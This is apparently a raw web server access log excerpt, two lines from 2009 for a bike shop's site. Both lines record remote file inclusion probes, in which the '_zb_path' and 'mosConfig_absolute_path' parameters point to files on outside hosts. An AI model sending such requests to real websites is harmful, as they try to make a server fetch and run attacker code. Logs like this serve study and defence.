122.153.212.195 - - [11/May/2009:07:59:25 -0700] "GET /?_zb_path=http://www.project80s.com/id.gif??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "houstonbikeshop.com"
86.54.102.45 - - [11/May/2009:08:07:20 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
